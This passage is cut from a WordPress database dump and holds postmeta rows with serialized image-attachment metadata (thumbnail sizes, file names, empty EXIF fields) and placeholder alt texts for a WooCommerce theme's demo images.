:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-550x733.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:733;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"blog-recipe-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(335,1134,'_wp_attachment_image_alt','a'),(336,712,'_wp_attachment_image_alt','o'),(337,4179,'_wp_attached_file','2018/03/landing-coming-soon-1.jpg'),(338,4179,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:530;s:6:\"height\";i:306;s:4:\"file\";s:33:\"2018/03/landing-coming-soon-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-coming-soon-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-1-530x300.jpg\";s:5:\"width\";i:530;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"landing-coming-soon-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(339,1143,'_wp_attached_file','2018/01/h9-img-1.jpg'),(340,1143,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:959;s:6:\"height\";i:1104;s:4:\"file\";s:20:\"2018/01/h9-img-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h9-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h9-img-1-600x691.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:691;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h9-img-1-261x300.jpg\";s:5:\"width\";i:261;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"h9-img-1-890x1024.jpg\";s:5:\"width\";i:890;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h9-img-1-768x884.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:884;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h9-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h9-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h9-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h9-img-1-959x550.jpg\";s:5:\"width\";i:959;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h9-img-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"h9-img-1-959x1100.jpg\";s:5:\"width\";i:959;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(341,713,'_wp_attached_file','2018/01/h4-img-7.jpg'),(342,713,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:350;s:4:\"file\";s:20:\"2018/01/h4-img-7.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h4-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h4-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h4-img-7-350x300.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h4-img-7-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h4-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(343,4179,'_wp_attachment_image_alt','a'),(344,4180,'_wp_attached_file','2018/03/landing-contact-us-1.jpg'),(345,4180,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:530;s:6:\"height\";i:306;s:4:\"file\";s:32:\"2018/03/landing-contact-us-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-contact-us-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-contact-us-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-contact-us-1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-contact-us-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"landing-contact-us-1-530x300.jpg\";s:5:\"width\";i:530;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"landing-contact-us-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"landing-contact-us-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-contact-us-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(346,713,'_wp_attachment_image_alt','o'),(347,724,'_wp_attached_file','2018/01/blog-img-2.jpg'),(348,724,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:734;s:4:\"file\";s:22:\"2018/01/blog-img-2.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"blog-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"blog-img-2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"blog-img-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"blog-img-2-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"blog-img-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"blog-img-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"blog-img-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"blog-img-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:23:\"blog-img-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"blog-img-2-550x734.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:734;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"blog-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"blog-img-2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(349,4180,'_wp_attachment_image_alt','a'),(350,4181,'_wp_attached_file','2018/03/landing-our-team-1.jpg'),(351,4181,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:530;s:6:\"height\";i:306;s:4:\"file\";s:30:\"2018/03/landing-our-team-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"landing-our-team-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-our-team-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"landing-our-team-1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-our-team-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"landing-our-team-1-530x300.jpg\";s:5:\"width\";i:530;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"landing-our-team-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"landing-our-team-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-our-team-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(352,1471,'_wp_attachment_image_alt','o'),(353,4181,'_wp_attachment_image_alt','a'),(354,1472,'_wp_attached_file','2018/01/h8-slide3-backgroun.jpg'),(355,1472,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1105;s:6:\"height\";i:737;s:4:\"file\";s:31:\"2018/01/h8-slide3-backgroun.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h8-slide3-backgroun-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"h8-slide3-backgroun-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h8-slide3-backgroun-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-550x737.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:737;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"h8-slide3-backgroun-1100x737.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:737;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h8-slide3-backgroun-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h8-slide3-backgroun-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(356,4187,'_wp_attached_file','2018/03/nova-vocka.png'),(357,4187,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:290;s:4:\"file\";s:22:\"2018/03/nova-vocka.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"nova-vocka-300x290.png\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"nova-vocka-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"nova-vocka-300x218.png\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"nova-vocka-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"nova-vocka-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"nova-vocka-300x290.png\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"nova-vocka-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(358,3944,'_wp_attachment_image_alt','a'),(359,2975,'_wp_attachment_image_alt','a'),(360,3951,'_wp_attachment_image_alt','a'),(361,2981,'_wp_attachment_image_alt','h'),(362,18,'_wp_attachment_image_alt','o'),(363,3952,'_wp_attachment_image_alt','a'),(364,2988,'_wp_attachment_image_alt','a'),(365,52,'_wp_attachment_image_alt','o'),(366,3953,'_wp_attachment_image_alt','a'),(367,1079,'_wp_attachment_image_alt','o'),(368,1817,'_wp_attachment_image_alt','a'),(369,2992,'_wp_attachment_image_alt','a'),(370,3969,'_wp_attachment_image_alt','s'),(371,73,'_wp_attachment_image_alt','o'),(372,1081,'_wp_attachment_image_alt','o'),(373,3007,'_wp_attachment_image_alt','o'),(374,1818,'_wp_attachment_image_alt','a'),(375,3973,'_wp_attachment_image_alt','a'),(376,1082,'_wp_attachment_image_alt','o'),(377,3061,'_wp_attachment_image_alt','a'),(378,88,'_wp_attachment_image_alt','o'),(379,1827,'_wp_attachment_image_alt','o'),(380,4029,'_wp_attachment_image_alt','f'),(381,1083,'_wp_attachment_image_alt','o'),(382,3112,'_wp_attachment_image_alt','o'),(383,1919,'_wp_attachment_image_alt','o'),(384,91,'_wp_attachment_image_alt','o'),(385,4048,'_wp_attachment_image_alt','s'),(386,1084,'_wp_attachment_image_alt','o'),(387,2002,'_wp_attachment_image_alt','o'),(388,3113,'_wp_attachment_image_alt','o'),(389,4049,'_wp_attachment_image_alt','j'),(390,1120,'_wp_attachment_image_alt','a'),(391,2005,'_wp_attachment_image_alt','a'),(392,3115,'_wp_attachment_image_alt','o'),(393,4076,'_wp_attachment_image_alt','j'),(394,1121,'_wp_attachment_image_alt','a'),(395,4108,'_wp_attachment_image_alt','s'),(396,2027,'_wp_attachment_image_alt','a'),(397,3116,'_wp_attachment_image_alt','o'),(398,1122,'_wp_attachment_image_alt','a'),(399,4109,'_wp_attachment_image_alt','m'),(400,611,'_wp_attachment_image_alt','o'),(401,3186,'_wp_attachment_image_alt','a'),(402,2055,'_wp_attachment_image_alt','a'),(403,1124,'_wp_attachment_image_alt','a'),(404,4110,'_wp_attachment_image_alt','m'),(405,631,'_wp_attachment_image_alt','o'),(406,3187,'_wp_attachment_image_alt','a'),(407,2061,'_wp_attachment_image_alt','a'),(408,1125,'_wp_attachment_image_alt','a'),(409,4111,'_wp_attachment_image_alt','m'),(410,642,'_wp_attachment_image_alt','o'),(411,3188,'_wp_attachment_image_alt','a'),(412,1126,'_wp_attachment_image_alt',''),(413,4112,'_wp_attachment_image_alt','m'),(414,2115,'_wp_attachment_image_alt','a'),(415,643,'_wp_attachment_image_alt','o'),(416,3189,'_wp_attachment_image_alt','a'),(417,4113,'_wp_attachment_image_alt','m'),(418,1128,'_wp_attachment_image_alt','a'),(419,2129,'_wp_attachment_image_alt','a'),(420,644,'_wp_attachment_image_alt','o'),(421,4178,'_wp_attachment_image_alt','a'),(422,3222,'_wp_attachment_image_alt','o'),(423,1129,'_wp_attachment_image_alt','a'),(424,4179,'_wp_attachment_image_alt','a'),(425,645,'_wp_attachment_image_alt','a'),(426,3223,'_wp_attachment_image_alt',''),(427,1130,'_wp_attachment_image_alt','a'),(428,4180,'_wp_attachment_image_alt','a'),(429,670,'_wp_attachment_image_alt','a'),(430,3224,'_wp_attachment_image_alt',''),(431,4181,'_wp_attachment_image_alt','a'),(432,1132,'_wp_attachment_image_alt','a'),(433,708,'_wp_attachment_image_alt','o'),(434,1133,'_wp_attachment_image_alt','a'),(435,709,'_wp_attachment_image_alt','o'),(436,1134,'_wp_attachment_image_alt','a'),(437,710,'_wp_attachment_image_alt','o'),(438,1143,'_wp_attachment_image_alt','o'),(439,712,'_wp_attachment_image_alt','o'),(440,713,'_wp_attachment_image_alt','o'),(441,724,'_wp_attachment_image_alt','a'),(442,1301,'_wp_attachment_image_alt',